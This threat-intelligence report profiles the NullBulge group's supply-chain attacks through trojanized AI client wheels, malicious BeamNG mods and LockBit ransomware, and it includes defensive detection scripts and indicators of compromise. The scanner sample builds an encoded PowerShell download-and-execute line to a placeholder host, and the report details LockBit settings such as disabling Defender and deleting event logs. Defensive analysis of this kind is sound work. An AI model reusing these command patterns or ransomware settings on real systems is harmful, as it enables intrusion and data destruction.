NullBulge

Between April and June 2024, the NullBulge group emerged, targeting users of AI-centric applications and gaming communities.  The NullBulge persona has showcased creative methods of distributing malware through those tools and platforms.  Though the group projects an image of activism, claiming to be "protecting artists around the world" and to be motivated by a pro-art, anti-AI cause rather than profit, other activities tied to this threat actor indicate otherwise.

NullBulge's services via the group's DLS

One service the group offers is described as "payback through honeypots and malicious mods."  The group delivers on this claim by targeting extensions and modifications of commonly used AI-art-adjacent applications and games.  This has been their main focus recently, delivering a small variety of malware payloads.

NullBulge's attacks are characterized by 'poisoning the well': the group targets the software supply chain by injecting malicious code into legitimate software distribution mechanisms, exploiting trusted platforms like GitHub, Reddit, and Hugging Face to maximize their reach.  NullBulge announces their leaks via their own data leak site (DLS)/blog, alongside occasional 4chan threads.  Further, the group uses customized LockBit ransomware builds to maximize the impact of their attacks.  In this post, we provide an overview of the NullBulge group's malicious activities and technical details of their LockBit payloads.

Discord, Reddit, and GitHub Code Distribution - The NullBulge group carried out a series of malicious campaigns targeting the supply chain of AI tools and platforms across May and June 2024.  This includes the compromise of the ComfyUI_LLMVISION extension on GitHub.  Additionally, the threat actor distributed malicious code through BeamNG mods on Hugging Face and Reddit. The GitHub-centric (ComfyUI_LLMVISION) and Hugging Face-centric campaigns are characterized by Python-based payloads exfiltrating data via Discord webhook.  The group’s other campaigns distributed more malware, including Async RAT and Xworm.


GitHub repository for malicious libraries

These campaigns resulted in malicious Python scripts that harvest and transmit data via Discord webhook.  The threat actor modified the bundled 'requirements.txt' file to pull custom Python wheels, so that installing the extension's dependencies fetched trojanized builds of the Anthropic and OpenAI client libraries instead of the genuine packages.  For example, the malicious wheels referenced a fake version of the OpenAI library (1.16.3); the recovered wheel files are listed in the indicators below as openai-1.16.2-py3-none-any.whl and anthropic-0.21.3-py3-none-any.whl.  These trojanized libraries contain Python code (e.g., Fadmino.py) that harvests and logs Chrome and Firefox browser credentials; for Firefox this involves decrypting the stored logins through Mozilla's Network Security Services (NSS) library.  Additional scripts, e.g., admin.py, parse the data and transmit it to the Discord webhook URL.

admin.py with encrypted Discord URL

In these campaigns, admin.py and Fadmino.py work together to gather sensitive local system data, organize and stage it, and finally transmit it to an external server via HTTP POST requests to the Discord webhook URL.

Cadmino.py extended data-collection script

The general flow in these scripts is: 

  • Data Discovery/Extraction: admin.py and Fadmino.py gather browser login data (Chrome and Firefox usernames and passwords).
  • Data Aggregation: admin.py and Cadmino.py gather, parse, and extract the data. Cadmino.py extends the data discovery to include geographic information, expanded system information, and installed applications, including data about security products and financial data.
  • Data Transmission: admin.py reconstructs the transmission URL from the encrypted Discord webhook and performs the exfiltration via HTTP POST.
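Because each campaign carries its own webhook token, and admin.py keeps the URL encrypted until run time, a network-side check should match the shape of the Discord webhook path rather than any one leaked URL. The following is an added example, not code from the original analysis or from the actor's scripts: it runs that check over a few constructed proxy log lines. The log layout, the IP addresses, and the webhook ID and token are placeholders, and the list of "scripted" user agents is an assumption to be tuned per environment.

```python
import re
from dataclasses import dataclass, field

# Discord webhook endpoint shape: /api/webhooks/<snowflake id>/<token>.
# Matching the path shape is more durable than matching one leaked URL, because
# every campaign (and every decrypted admin.py) carries its own id and token.
WEBHOOK_RE = re.compile(
    r"https?://(?:[\w-]+\.)?discord(?:app)?\.com/api(?:/v\d+)?/webhooks/(\d{17,20})/[\w-]{50,}",
    re.IGNORECASE,
)
# User agents that point to a script rather than a Discord client or browser (assumed list).
SCRIPTED_UA_RE = re.compile(
    r"python-requests|python-urllib|urllib3|aiohttp|curl/|wget/|powershell", re.IGNORECASE
)
# Constructed proxy log layout used by this example (not any vendor's schema):
#   <timestamp> <src_ip> <method> <url> <status> <bytes_out> "<user-agent>"
LOG_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) (\d{3}) (\d+) "([^"]*)"$')


@dataclass
class Alert:
    src: str
    webhook_id: str
    user_agent: str
    bytes_out: int
    reasons: list = field(default_factory=list)


def detect_webhook_exfil(lines, large_post_bytes=64 * 1024):
    """Flag HTTP POSTs to Discord webhooks that look like scripted exfiltration.

    Every webhook POST is reported (the Discord client itself does not use this path;
    legitimate integrations that do should be allowlisted); a scripted user agent or a
    large upload adds a reason that raises the priority of the alert.
    """
    alerts = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # tolerate malformed lines instead of aborting the sweep
        _ts, src, method, url, _status, bytes_out, ua = m.groups()
        hook = WEBHOOK_RE.search(url)
        if hook is None or method.upper() != "POST":
            continue
        reasons = ["POST to Discord webhook"]
        if SCRIPTED_UA_RE.search(ua):
            reasons.append(f"scripted user agent: {ua}")
        if int(bytes_out) >= large_post_bytes:
            reasons.append(f"large upload: {bytes_out} bytes")
        alerts.append(Alert(src, hook.group(1), ua, int(bytes_out), reasons))
    return alerts


# Constructed sample traffic (placeholder addresses, id and token; not real logs).
_TOKEN = "a" * 68  # placeholder; real webhook tokens are a long base64url string
SAMPLE_LOGS = [
    '2024-06-05T10:01:02Z 10.0.0.23 GET https://pypi.org/simple/openai/ 200 812 "pip/24.0"',
    f'2024-06-05T10:01:09Z 10.0.0.23 POST https://discord.com/api/webhooks/123456789012345678/{_TOKEN} 204 183342 "python-requests/2.31.0"',
    '2024-06-05T10:02:11Z 10.0.0.40 POST https://discord.com/api/v9/channels/1/messages 200 412 "Mozilla/5.0 discord/1.0.9"',
    f'2024-06-05T10:03:00Z 10.0.0.51 POST https://discord.com/api/webhooks/223456789012345678/{_TOKEN} 204 950 "Mozilla/5.0 (Windows NT 10.0) Chrome/125.0"',
]

if __name__ == "__main__":
    for a in detect_webhook_exfil(SAMPLE_LOGS):
        print(a.src, a.webhook_id, "; ".join(a.reasons))
```

The first sample host produces the high-priority hit (webhook POST, python-requests user agent, ~180 KB upload); the ordinary Discord channel message on the third line is not a webhook call and is ignored, while the fourth line is still reported as a webhook POST so an analyst can decide whether that integration belongs on an allowlist.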


Decrypted Discord URL from admin.py

The NullBulge group has also distributed malicious code via Hugging Face, including maliciously crafted tools named "SillyTavern Character Generator" and "Image Description with Claude Models and GPT-4 Vision".  These tools carry malicious dependencies in the same manner as the compromised ComfyUI_LLMVISION repository, and the payloads delivered through the trojanized wheels function identically to those observed there.


Distribution via Hugging Face

The AppleBotzz Identity - Across the GitHub and Hugging Face repository-centric attacks, the AppleBotzz identity hosted the code in the compromised repositories and authored the posts on ModLand.  This prompted discussion of whether AppleBotzz and the NullBulge threat actor are one and the same.  NullBulge has claimed control of the ComfyUI_LLMVISION GitHub repository for the duration of its activity, and no non-malicious code was ever posted there, which fuels skepticism that the two are separate entities.  NullBulge nonetheless stated on its blog that they are separate: the group says it compromised the credentials of the original ComfyUI_LLMVISION maintainer, which gave it the ability to push the malicious code to that repository.


NullBulge statement on the AppleBotzz identity

A similar statement was posted to the original ComfyUI_LLMVISION GitHub by the threat actor:


Archived statement on the ComfyUI_LLMVISION GitHub

The AppleBotzz identity was also used on ModLand and similar platforms to spread malicious BeamNG mods.  NullBulge claims to have taken over every account previously controlled by AppleBotzz on platforms including Hugging Face, GitHub, ModHub, and ModLand.  A more probable scenario is that NullBulge has controlled the AppleBotzz identity all along, as a persona central to its malware staging and delivery process.  There is, however, insufficient evidence to confirm this hypothesis at this time.

Malware Delivery | Async RAT and Xworm - NullBulge has targeted BeamNG users.  BeamNG is a vehicle simulation game that uses soft-body physics to model vehicle dynamics, collisions, and deformation in an open-world sandbox environment.  On 4 June 2024, a thread titled "BeamNG mods are not safe anymore" was posted to the BeamNG community forum, highlighting an emerging concern over specific mods.  The compromise was further detailed in a YouTube video by Eric Parker.  The attack originates from malicious Lua code delivered in a BeamNG mod file: obfuscated PowerShell injected into the mod downloads Async RAT or Xworm, which in turn leads to deployment of the group's customized LockBit payloads.  Initial distribution of the trojanized mods occurs via base64-encoded links on social media profiles set up by the threat actor, and the mods were also distributed via ModLand and similar BeamNG-related communities.


Malicious ModLand post, AppleBotzz identity


Base64-encoded link for malicious BeamNG mod distribution

These encoded strings decode to download links hosted on various services, including Modsfire and pixeldrain.  Examples:

  • https[:]//modsfire[.]com/IzozIsm52J72cWM
  • https[:]//modsfire[.]com/1Nhyzs0OpLDu204
  • https[:]//modsfire[.]com/IzpzklsmT2jz7W1
  • http[:]//pixeldrain[.]com/api/file/HnEcyLBm
  • https[:]//pixeldrain[.]com/api/file/SoRcBJnZ

These now-defunct links led to Async RAT payloads.

The malicious BeamNG mods were distributed as torrents or zip archives across BeamNG-focused forums and subreddits.  The mods contain Lua code that executes when BeamNG loads the mod.  The malicious Lua is placed into the various Lua 'extensions' packaged in the mod (example: VersionCheck.lua, 5c61e08914d4108aa52401412a61ddbbb68ca7cc).


Obfuscated PowerShell in malicious BeamNG mod

The Lua files contain base64-encoded PowerShell that, when decoded, downloads and executes the Async RAT sample via Invoke-WebRequest.  The string in the previous image decodes to such a download request: in this case, the Async RAT instance is downloaded from a pixeldrain[.]com address and executed under the process name BeamNG.UI.exe.
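The following added example (not from the original analysis or from the actor's mod files) implements the two decoding steps described above: turning a base64 string of the kind posted on the actor's social-media profiles into a defanged URL, and scanning a BeamNG mod archive for Lua files that embed base64-encoded PowerShell, decoding both UTF-16LE blobs (what PowerShell's -EncodedCommand expects) and plain UTF-8 blobs and extracting any download URLs. The sample archive, its Lua contents, the marker cmdlet list, the 40-character base64 threshold, and the pixeldrain-style URLs are constructed for the example; the file name VersionCheck.lua mirrors the one named in the report, but the contents are not the real mod's.

```python
import base64
import binascii
import io
import re
import zipfile

URL_RE = re.compile(r"https?://[^\s'\"<>)]+", re.IGNORECASE)
# Base64 runs long enough to hold a command; 40 characters is an assumed threshold.
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
# Cmdlets and idioms a downloader stage is likely to use (assumed list, not exhaustive).
PS_MARKERS = re.compile(
    r"Invoke-WebRequest|\biwr\b|DownloadString|DownloadFile|Start-Process|"
    r"-EncodedCommand|FromBase64String|\bIEX\b",
    re.IGNORECASE,
)


def defang(url):
    """Render a URL non-clickable for reporting (hxxp, [.])."""
    return url.replace("http", "hxxp", 1).replace(".", "[.]")


def decode_blob(blob):
    """Base64-decode a blob; returns text or None.

    PowerShell's -EncodedCommand takes UTF-16LE, which shows up as a NUL in every
    second byte, so that case is detected first; anything else is tried as UTF-8.
    """
    try:
        raw = base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return None
    if raw and raw[1::2].count(0) > len(raw) // 4:
        try:
            return raw.decode("utf-16-le")
        except UnicodeDecodeError:
            pass
    try:
        return raw.decode("utf-8")
    except UnicodeDecodeError:
        return None


def decode_posted_link(text):
    """Turn a base64 string of the kind posted on the actor's profiles into a defanged URL."""
    decoded = decode_blob(text.strip())
    if decoded:
        m = URL_RE.search(decoded)
        if m:
            return defang(m.group(0))
    return None


def scan_mod(zip_bytes):
    """Find Lua files in a BeamNG mod archive that embed base64-encoded PowerShell."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            if not name.lower().endswith(".lua"):
                continue
            text = zf.read(name).decode("utf-8", errors="replace")
            for blob in B64_RE.findall(text):
                decoded = decode_blob(blob)
                if not decoded or not PS_MARKERS.search(decoded):
                    continue  # not base64, or not PowerShell: skips hashes and other long runs
                findings.append({
                    "file": name,
                    "urls": [defang(u) for u in URL_RE.findall(decoded)],
                    "snippet": decoded[:120],
                })
    return findings


# ---- constructed sample data (not the real mod; URLs and file ids are placeholders) ----
SAMPLE_POSTED_LINK = base64.b64encode(b"https://pixeldrain.example/api/file/BBBBBBBB").decode()


def build_sample_mod():
    """Assemble an in-memory mod archive with one trojanized and one benign Lua extension."""
    ps = ("Invoke-WebRequest -Uri 'http://pixeldrain.example/api/file/AAAAAAAA' "
          "-OutFile \"$env:TEMP\\BeamNG.UI.exe\"; Start-Process \"$env:TEMP\\BeamNG.UI.exe\"")
    enc = base64.b64encode(ps.encode("utf-16-le")).decode()
    trojanized_lua = (
        "local M = {}\n"
        "local function onExtensionLoaded()\n"
        f'  os.execute("powershell -w hidden -enc {enc}")\n'
        "end\n"
        "M.onExtensionLoaded = onExtensionLoaded\n"
        "return M\n"
    )
    benign_lua = "local M = {}\nfunction M.onInit() log('I', 'mod', 'loaded') end\nreturn M\n"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("lua/ge/extensions/VersionCheck.lua", trojanized_lua)
        zf.writestr("lua/ge/extensions/tuning.lua", benign_lua)
        zf.writestr("info.json", '{"name": "sample mod"}')
    return buf.getvalue()


if __name__ == "__main__":
    print("posted link ->", decode_posted_link(SAMPLE_POSTED_LINK))
    for f in scan_mod(build_sample_mod()):
        print(f["file"], f["urls"])
```

The scanner reports only the trojanized extension, with the decoded download URL defanged for the report; the benign extension and the non-Lua files produce nothing. Because any Lua extension in a mod runs as soon as the game loads it, the same scan is worth running on mods before they are copied into the game's mods folder, not only after an incident.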

Custom LockBit Payloads - NullBulge delivers LockBit ransomware payloads to its Async RAT and Xworm victims as a later-stage infection.  The aforementioned Eric Parker video also discusses this portion of the attack.  NullBulge's payloads are produced with the leaked LockBit 3.0 (aka LockBit Black) builder, unchanged aside from a customized configuration file (config.json):

  • SHA1: bca6d4ab71100b0ab353b83e9eb6274bb018644e
  • Name: LockBit3Builder.zip

Along with config.json, the archive bundles builder.exe, keygen.exe, and build.bat, a batch file that automates generation of the paired encryptor and decryptor executables.  Build.bat (804a1d0c4a280b18e778e4b97f85562fa6d5a4e6) is unchanged from the standard leaked LockBit 3.0/LockBit Black builder bundles.

Unmodified build.bat from the NullBulge builder archive

The config.json (705d068fb2394be5ea3cb8ba95852f4a764653a9) file contains settings for the payload UID along with all the behavioral components to be controlled upon the building of the payloads.  This includes the following configuration settings:

  • "encrypt_mode": "auto",
  • "encrypt_filename": false,
  • "impersonation": true,
  • "skip_hidden_folders": false,
  • "language_check": false,
  • "local_disks": true,
  • "network_shares": true,
  • "kill_processes": true,
  • "kill_services": true,
  • "running_one": true,
  • "print_note": true,
  • "set_wallpaper": true,
  • "set_icons": true,
  • "send_report": false,
  • "self_destruct": true,
  • "kill_defender": true,
  • "wipe_freespace": false,
  • "psexec_netspread": false,
  • "gpo_netspread": true,
  • "gpo_ps_update": true,
  • "shutdown_system": false,
  • "delete_eventlogs": true,
  • "delete_gpo_delay": 1

In the provided configuration, encryption is set to auto rather than fast mode, and both local volumes (local_disks) and network shares (network_shares) are in scope.  Process and service termination (kill_processes, kill_services) and Defender tampering (kill_defender) are enabled, as are deletion of event logs (delete_eventlogs), self-deletion after execution (self_destruct), and printing of the ransom note to attached printers (print_note).  Lateral spread is configured through Group Policy (gpo_netspread, gpo_ps_update) rather than PsExec (psexec_netspread is off), the language check that would abort on hosts with certain system locales is disabled (language_check), and reporting back to the operator is off (send_report).  The configuration also defines which files and folders are included in or excluded from encryption, which processes to terminate, and the contents of the ransom note.

NullBulge config.json

The ransom note construction is also handled via the config.json file, customized with NullBulge’s identifying modifications.

NullBulge ransom note configuration

Data Leak Sites and Recent Targeting - NullBulge operates multiple active leak sites.  Its initial .com and .onion sites went live in late May 2024; as of July 2024, the .se and .co domains are active and updated continuously.  Its domains include:

  • goocasino[.]org
  • nullbulge[.]com
  • nullbulge[.]se
  • nullbulge[.]co
  • nullblgtk7dwzpfklgktzll27ovvnj7pvqkoprmhubnnb32qcbmcpgid[.]onion

As of this writing, the NullBulge DLS lists multiple victims.  Most of the site is dedicated to documenting the group's cause, along with its self-declared rules of engagement.  At the end of June 2024, NullBulge announced a leak of information from Disney, which allegedly included web publishing certificates and sprites from the animated series DuckTales.

Disney releases from NullBulge

Disney releases from NullBulge

A later "Release is Close" post updated the Disney leaks with a base64-encoded link to a ~670MB file, DuckTales_Isolated.zip, hosted on pixeldrain[.]com.

Leaked Disney data on pixeldrain

This archive contains multiple Photoshop Document (PSD) files related to the DuckTales series.  The leaks were also posted to 4chan under the !!z694g7GKz7l identity, in posts containing base64-encoded strings that link to the leaked data.

NullBulge announcing Disney leaks on 4chan

On 12 July, the NullBulge group released a ~1.2TB archive purportedly containing multiple years of Disney’s internal Slack data.  The release of this data was preceded by countdown posts across the threat actor’s online profiles.  NullBulge claims they obtained the data using compromised corporate account credentials.

Countdown timer, 11 July 2024

Profiles and Other Activities - In addition to 4chan posts under !!z694g7GKz7l, NullBulge maintains active profiles across multiple common underground forums.  They have a history of selling infostealer logs from their custom stealer on the CRACKED[.]io forum.


NullBulge selling infostealer logs on cracked[.]io forum

The actor also has a history of selling stolen OpenAI API keys on these forums.  This shows that NullBulge's activity is not limited to actions that could be framed as protecting artists' rights: its activities are financially focused, and it develops or acquires whatever tools are needed to that end.  The actor behind NullBulge also maintains a GitHub repository under the name NullBulgeOfficial, containing their Discord webhook libraries and a custom Python library for interacting with the AvCheck API.  Additionally, NullBulge has a mysellix[.]io profile, which has been used to sell OpenAI API keys.


NullBulge OpenAI API key sales

Conclusion - NullBulge is a low-sophistication actor targeting an emerging pool of victims with commodity malware and ransomware.  The group's invasive targeting of AI-centric games and applications threatens those working with such technologies and highlights an area of growing interest for threat actors.  Its methods of staging and delivering malicious code, such as obfuscated code in public repositories, are not new, but the target demographic is an emerging sector that is increasingly under attack.  Groups like NullBulge represent the ongoing threat of low-barrier-to-entry ransomware, combined with the evergreen effect of infostealer infections.

NullBulge and similar threat actors use well-seasoned malware families like Xworm and Async RAT.  These tools generate infostealer logs that can fuel bigger and more elaborate attacks, as the recent attacks involving Snowflake customer accounts demonstrated.  Additionally, the attack surface of platforms like BeamNG is ripe for exploitation: in the BeamNG case, attackers execute arbitrary PowerShell from 'trusted' Lua scripts as soon as the game loads the mod, with the privileges of the user running the game.  This is a very attractive mechanism for malicious actors and not dissimilar to software supply-chain attacks that deliver payloads through NPM packages, which we have discussed previously.

To reduce your organization’s exposure to techniques used by NullBulge, consider the following security measures:

  • API Key Management: Store API keys securely and never hardcode them in source. Use environment variables or a secrets vault, and rotate keys regularly to limit the impact of a compromise.
  • Code Review and Verification: Inspect third-party code for obfuscated or suspicious content, and pay close attention to dependency declarations in support files such as requirements.txt and their equivalents (direct wheel references, alternate package indexes). Ensure that third-party code is taken from a trusted and verified source. Routinely review commit histories and know who the active contributors are, so that suspicious commits or requests stand out. Be wary of installing code from public sources that receive little or no scrutiny.
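As an added example of the dependency review recommended above (not code from the original post), the function below audits a requirements.txt for the pattern used in the ComfyUI_LLMVISION and Hugging Face campaigns: direct references to wheels, local archives, index overrides, and exact pins that the reviewer cannot confirm as published releases. The sample requirements file, the placeholder URLs and paths, and the known-good version list are constructed; pip's backslash continuation lines and -r includes are assumed absent, and PyPI is assumed to be the only approved index.

```python
import re
from dataclasses import dataclass

TRUSTED_INDEX = "https://pypi.org/simple"  # assumption: PyPI is the only approved index


@dataclass
class Finding:
    line_no: int
    text: str
    reason: str


# Simplified pip requirements syntax (assumed: no "\" continuation lines, no -r includes).
OPTION_RE = re.compile(
    r"^(-i|--index-url|--extra-index-url|-f|--find-links|--trusted-host|-e|--editable)(?:[ =](.*))?$"
)
DIRECT_REF_RE = re.compile(r"^([A-Za-z0-9][A-Za-z0-9._-]*)\s*@\s*(\S+)")
PIN_RE = re.compile(r"^([A-Za-z0-9][A-Za-z0-9._-]*)\s*(==|~=|>=|<=|!=|>|<)\s*([0-9][\w.]*)")
PATH_RE = re.compile(r"^(?:https?://|file:|\.{1,2}/|/|[A-Za-z]:\\)|\.(?:whl|tar\.gz|zip)$", re.IGNORECASE)


def audit_requirements(text, known_versions=None):
    """Return findings for requirement lines that bypass or weaken the trusted index.

    known_versions maps a normalised project name to the set of release versions the
    reviewer has confirmed exist; an exact pin outside that set is reported, which is
    how a wheel labelled with a version that was never published gets caught offline.
    """
    known_versions = known_versions or {}
    findings = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        line = line.split(" #", 1)[0].strip()       # drop trailing comment
        has_hash = "--hash=" in line
        spec = line.split(" --hash", 1)[0].strip()  # requirement without hash options
        opt = OPTION_RE.match(spec)
        if opt:
            flag, arg = opt.group(1), (opt.group(2) or "").strip()
            if flag in ("-i", "--index-url", "--extra-index-url") and not arg.startswith(TRUSTED_INDEX):
                findings.append(Finding(n, line, f"{flag} sends installs to {arg}"))
            elif flag in ("-f", "--find-links"):
                findings.append(Finding(n, line, "--find-links lets a local or remote wheel shadow the index"))
            elif flag == "--trusted-host":
                findings.append(Finding(n, line, "--trusted-host disables TLS verification for that host"))
            elif flag in ("-e", "--editable"):
                findings.append(Finding(n, line, "editable install runs build code from the referenced source"))
            continue
        direct = DIRECT_REF_RE.match(spec)
        if direct:
            findings.append(Finding(n, line, f"direct reference bypasses the index: {direct.group(1)} @ {direct.group(2)}"))
            continue
        if PATH_RE.search(spec):
            findings.append(Finding(n, line, "installs from a URL or local archive instead of the index"))
            continue
        pin = PIN_RE.match(spec)
        if not pin:
            findings.append(Finding(n, line, "unpinned requirement; resolves to whatever the index serves"))
            continue
        name, op, ver = pin.groups()
        if op != "==":
            findings.append(Finding(n, line, f"loose specifier {op}{ver}; not reproducible"))
            continue
        key = name.lower().replace("_", "-")
        if key in known_versions and ver not in known_versions[key]:
            findings.append(Finding(n, line, f"{name}=={ver} is not a release in the reviewer's known-good list"))
        if not has_hash:
            findings.append(Finding(n, line, "exact pin without --hash; the downloaded artifact is unverified"))
    return findings


# Constructed sample mirroring the campaign's pattern; the URLs, paths and the
# known-good version list are placeholders, not the actual distribution points.
SAMPLE_REQUIREMENTS = """\
# constructed sample; URLs are placeholders, not the real distribution points
torch>=2.0
openai @ https://example.invalid/dl/openai-1.16.3-py3-none-any.whl
./wheels/anthropic-0.21.3-py3-none-any.whl
--extra-index-url https://mirror.example.invalid/simple
requests==2.32.3 --hash=sha256:0000000000000000000000000000000000000000000000000000000000000000
numpy==1.26.99
"""
KNOWN_GOOD = {"numpy": {"1.26.4", "2.0.0"}}  # constructed list for the example

if __name__ == "__main__":
    for f in audit_requirements(SAMPLE_REQUIREMENTS, KNOWN_GOOD):
        print(f"line {f.line_no}: {f.reason}")
```

Only the hashed, exactly pinned line passes; the direct wheel reference and the local .whl path are the two forms the trojanized extension relied on, and the extra index is the quieter variant that lets a look-alike package name win resolution. In practice the known-good set would be filled from `pip index versions <name>` or a private mirror's release list before review.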

 

Indicators of Compromise

SHA1                                      Description
f37da01783982b7b305996a23f8951693eb78f72  Async RAT (via Pixeldrain)
0cd5dc12bca41f6667547aa10b9cf1d989ba30a0  Async RAT (via Pastebin)
843d0df759ffd79b00f0adef3371e003a3539977  Xworm (via Pastebin)
c6a884dcf21c44de3e83427a28428c24582a8b6f  anthropic-0.21.3-py3-none-any.whl
5a18ba89c118a7c31f3e8f674727da08779421ce  openai-1.16.2-py3-none-any.whl
89d9b7c3eff0a15dc9dbbfe2163de7d5e9479f58  LockBit 3.0
93460d0789dce9cf65a90e542424b0ac057e1dc5  admin.py
dcb47900458692589a594a293c1c7c2559cc4cbe  Fadmino.py
9eb83ab3f53e99cdc9948a6123c7c90fad9e3991  cadmino.py
2d1dca9c10996143b698a9351d1eb446c19f92a7  VersionCheck.lua
756e6c96d1dd75e4d27af7c36da751ab496cedb8  VersionCheck.lua
304f71ccf9d533d0cdeba97546addcac6d6b53e7  Ransom note
705d068fb2394be5ea3cb8ba95852f4a764653a9  LockBit builder config JSON
bca6d4ab71100b0ab353b83e9eb6274bb018644e  LockBit3Builder.zip
804a1d0c4a280b18e778e4b97f85562fa6d5a4e6  build.bat
ec03fd1551d31486e2f925d9c2db3b87ffcd7018  keygen.exe
8899fe6ecfe7b517a4c80ebb3b5c50e6e93b7294  LockBit_NullBulge payload
2a8951d35e853b2c2fd5753b686dd132f20ac355  LockBit_NullBulge payload
3f6c619bdc7d931a9a9f82dfc77963a02ab9c2bf  LockBit_NullBulge payload
886e3667273e50a7295224332084d7fde8836546  LockBit_NullBulge payload
4b53022bf125bd789ef43271666ac960f841c4f9  LockBit_NullBulge payload
4fdc357f1dfc54a19e31c210f0783dffc77039d9  LockBit_NullBulge payload
de256f9d30b0dca87f8127323271f7196fe0f262  Malicious BeamNG mod
5c61e08914d4108aa52401412a61ddbbb68ca7cc  VersionCheck.lua
28b5aaab8fa92aeade193dc13feca491559fc88f  Malicious BeamNG mod
3e417d9bb9f6ce10b9c66b468b9fe79d8f06c36b  Malicious BeamNG mod
c8e93fc737e6c7822de62a969e9c0048847dabc5  Malicious BeamNG mod
0cbac9e999094d8a3bd3da985c57031dd7614f20  Malicious BeamNG mod

Network

  • group.goocasino[.]org
  • nullbulge[.]com
  • nullbulge[.]se
  • nullbulge[.]co
  • 86[.]107.168.9
  • nullblgtk7dwzpfklgktzll27ovvnj7pvqkoprmhubnnb32qcbmcpgid[.]onion

XMR (Monero) address

  • 45i7kjWZuzJ4PdSbandaaE8S6mQATmneTYEpgsaaCqDmc7foEJDXwxd3ABR8bn6YE4c7hZ2dYEEr1CwG48gAknPL6zUpYyV

 

This article is shared at no charge and is for educational and informational purposes only.

Again, we’d like to thank Sentinel Labs for this great analysis.  Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization.  We provide indicators of compromise information via a notification service (RedXray) or an analysis service (CTAC).  For questions, comments, or assistance, please get in touch with the office directly at 1-844-492-7225, or feedback@redskyalliance.com    

Weekly Cyber Intelligence Briefings:
REDSHORTS - Weekly Cyber Intelligence Briefings
https://register.gotowebinar.com/register/5378972949933166424
